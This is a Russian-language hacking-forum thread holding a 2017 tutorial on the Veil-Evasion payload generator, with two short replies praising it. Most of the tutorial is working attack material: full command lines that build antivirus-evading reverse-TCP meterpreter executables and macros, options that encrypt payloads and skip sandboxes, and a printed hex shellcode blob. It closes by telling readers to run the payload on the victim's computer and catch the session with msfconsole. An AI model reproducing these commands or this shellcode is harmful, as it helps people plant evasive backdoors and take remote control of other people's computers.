HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.11.2017, 22:23
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

Установка
Часть первая. Veil Ordnance.
Часть вторая. Veil Evasion
Взлом удаленного компьютера. Veil-Evasion. Metasploit.

Итак Evasion.
Мощнейший генератор пейлоадов самого различного формата, может дофига всего: от генерации макросов до простых екзешников.

Так же как и Ordnance, Evasion можно использовать либо командами для быстрой генерации, либо через меню.
Через меню вы тщательнее изучаете кишки фреймворка, а командами уже быстро генерите что-то своё при изменении каких-нибудь входных данных.

Например:

Код:


Код:
./Veil.py -t Evasion -p 3 -c architecture=x86 posh_batch=/usr/share/veil-output/source/use20.bat -o macro3
Строка использует 3 пейлоад из списка, для архитектуры x86, берёт батник с повершеллом и генерит нам макрос
Допустим, вы перегенерировали скрипт или нужно сменить архитектуру, и вместо того чтобы заного заходить в меню фреймворка, вспоминать что у вас там было, устанавливать параметры... вы генерируете макрос одной строкой. Батник сформировал 20-ым пейлоадом.

Evasion может на первый взгляд показаться громоздким, но это не так (вроде бы).

План:
  • Evasion команды в терминале
  • Evasion в меню фреймворка
  • Использование
Evasion команды в терминале

Код:


Код:
./Veil.py -t Evasion --list-payloads
- Вывод всех доступных пейлоадов (--list-payloads) для инструмента Evasion (-t Evasion)



Код:


Код:
./Veil.py -t Evasion -p 27 --ordnance-payload rev_tcp --ip 192.168.6.30 --port 4443 -o use27
Данная команда генерит исполняемую (.exe) полезную нагрузку, где используется инструмент Evasion (-t Evasion) с выбранным порядковым номером полезной нагрузки (-p 27, номер можно узнать из команды выше), в качестве шеллкода используется нагрузка из инструмента Ordnance (--ordnance-payload rev_tcp), устанавливается ip слушателя LHOST проще говоря (--ip 192.168.6.30) на 4443 порту (--port 4443) с названием файла use27 (-o use27)

По итогу отработки мы получим скрин


[*] Language: Язык, который использоваться при создании нагрузки[*] Payload Module: Модуль нагрузки[*] Executable written to: Место куда записался исполняемый файл (его и нужно доставить на целевой компутер)[*] Source code written to: Исходный код[*] Metasploit RC file written to: RC файл для metasploit, который используется для быстрого запуска листенера.

Код:


Код:
./Veil.py -t Evasion -p 12 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.6.30 --port 4444 -o use12
- Как можно догадаться (можно да?) команда очень похожа на предыдущую, только вместо Ordnance для генерации шелкода используется msfvenom. Так же используем полезную нагрузку инструмента Evasion (-t Evasion), под номером 12 (-p 12), устанавливаем обратный IP 192.168.6.30 (--ip 192.168.6.30) на порт 4444 (--port 4444) и выходной файл иметь будет имя use12 (-o use12)

Некоторые пейлоады могут нести в себе различные кастомные параметры, которые так же можно задавать командой. Возьмём для примера python/shellcode_inject/des_encrypt, имеющий порядковый номер 32 в Evasion



Код:


Код:
./Veil.py -t Evasion -p 32 --ordnance-payload rev_tcp --ip 192.168.6.30 --port 4444 -o use32 -c use_pyherion=y hostname=thegrid processors=2
- Используем в Evasion (-t Evasion) 32-ую полезную нагрузку (-p 32), генерируем пейлоад через Ordnance (--ordnance-payload rev_tcp) на IP 192.168.6.30 (--ip 192.168.6.30) и порт 4444 (--port 4444) задаём имя use32 (-o use32), сейчас задаём кастомные параметры (-с): использовать енкриптор phyerion (use_pyherion=y), задаём проверить имя хоста (hostname=thegrid) и кол-во процессоров (processors=2), как говорит первоисточник, проверки хоста необходимы для того, чтобы избежать запуска и активации пейлоада в песочнице, но это уже информация для любознательных и узких специалистов.

Код:


Код:
./Veil.py --clean
Как можно понять из названия вычищает скомпилированные нагрузки, исходные коды, файлы обработчиков и хеши проверок на вирустотале и результаты проверок



Evasion в меню фреймворка



Разбор генерации кастомных шеллкодов


При использовании некоторых пейлоадов можно выбрать кастомный шеллкод, если так, то при генерации вам встретится сиё окно



1 - генерация с помощью Ordnance
Данный инструмент был разобран в первой части

2 - генерация с MSFVenom
MSFVenom в своей обычной среде обитания может создавать нагрузки для многих операционных систем (винда, линух, андроид), однако в Veil Evasion можно создавать только виндовую нагрузку о чём, собственно, нас и уведомит нажатие Tab



Стоит отметить что MSFVenom огромный генератор пейлоадов со своей спецификой и особенностями, изучение которых займёт не одну неделю.

3 - кастомный шеллкод, который вы создали где-то на стороне.



Имеет вид
\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x 8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f \xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x 2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52 \x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x 51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b \x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x 01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75 \xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x 58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24 \x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x 12\xeb\x89\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e \x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xdb\x53\x 53\x53\x53\x53\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53 \x6a\x03\x53\x53\x68\x5b\x11\x00\x00\xeb\x4e\x50\x 68\x57\x89\x9f\xc6\xff\xd5\x53\x68\x00\x32\xe0\x84 \x53\x53\x53\xeb\x3d\x53\x50\x68\xeb\x55\x2e\x3b\x ff\xd5\x96\x6a\x10\x5f\x68\x80\x33\x00\x00\x89\xe0 \x6a\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\x d5\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5 \x85\xc0\x75\x18\x4f\x75\xd9\x68\xf0\xb5\xa2\x56\x ff\xd5\xeb\x42\xe8\xbe\xff\xff\xff\x2f\x31\x74\x52 \x65\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x 00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53 \x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x 12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xbf\x8b\x07\x01 \xc3\x85\xc0\x75\xe5\x58\xc3\xe8\x69\xff\xff\xff\x 31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e\x31\x00

закидывать его необходимо в одну строку, без кавычек.

4 - Тоже кастомный шеллкод, но уже считываемый из файла. Указываем прямой путь до него.



5 - Бинарный файл с шеллкодом



Указываем, соответственно, путь до бинарника.

Пейлоады
Список был дан в начале статьи. В начале было желание разобрать каждый и дать по нему инфу, но меня хватило где-то до 14-ого, потом уже понял что действия одни и теже, посему уже приведённых выше примеров более чем достаточно, да и Vander так же достаточно подробно всё расписал.
Также был найдет отличный видос, где чел пробует запускать каждый (почти) пейлоад.

Использование

Создаёте нагрузку, используя любой пейлоад из доступных. Если есть опция USE_PYHERION (ето енкриптор, позволяет более менее обходить AV), то всегда ставьте её в Y.
Используя силу джедая, запускаете пейлоад на компьютере атакуемого. Если антивирус не сожрал, то ловите сессию в meterpreter. Тем более что rc файл для быстрого его запуска Veil в большинстве случаев заблаговременно создаёт.
Строка "Metasploit RC file written to". Затем

Код:


Код:
msfconsole -r тут_строка_до_rc_файла
На сим и закончим)
Спасибо за внимание)

Установка
Часть первая. Veil Ordnance.
Часть вторая. Veil Evasion
Взлом удаленного компьютера. Veil-Evasion. Metasploit.
 
Ответить с цитированием

  #2  
Старый 25.11.2017, 22:39
d3l373d
Новичок
Регистрация: 15.07.2016
Сообщений: 0
С нами: 5172238

Репутация: 0
По умолчанию

Итак, призываю все группы оценивать статью с помощью систем репутации, "Мне нравится" или комментариев.
Отныне, просто состоять в группе мало для того, чтобы в ней оставаться. Ваша задача, так же наставлять авторов и оценивать их.
Критерии:
Статья достойна репутации +1 балл
Статья отстой и/или не соблюдены правила -1 балл
Статья неплохая, но на репу не катит - поставить лайк - оставить комментарий.
Статья нейтральная не гавно но и не шедевр - оставить комментарий.

Grey
@a113
@AL04E
@Celestial
@d7uk4r3v
@DoberGroup
@ghost
@Ishikawa
@JuicyBrute
@koldonuuchu
@MAdDog719
@nemainthium
@Underwood
@Vertigo
@WIPE
Red
@Dr.Jo.Frink
@Dr.Lafa
@grapf92
@id2746
@IioS
@Ondrik8
@r1991omen
@Sniff
@z3RoTooL
Eleet
@ghostphisher
@kot-gor
@PingVinich
@SooLFaa
@Vander
@~~DarkNode~~
 
Ответить с цитированием

  #3  
Старый 26.11.2017, 16:50
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Ставлю репу. Вот конктретно за эту статью, а именно за разжевал до буквы - меньше тем будет пустобрешных от недопонятых. Автору пожелаение: запилить серию статей как ты с этим фреймоворком в атаку ходишь. Со всеми подробностями и тонкостями
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.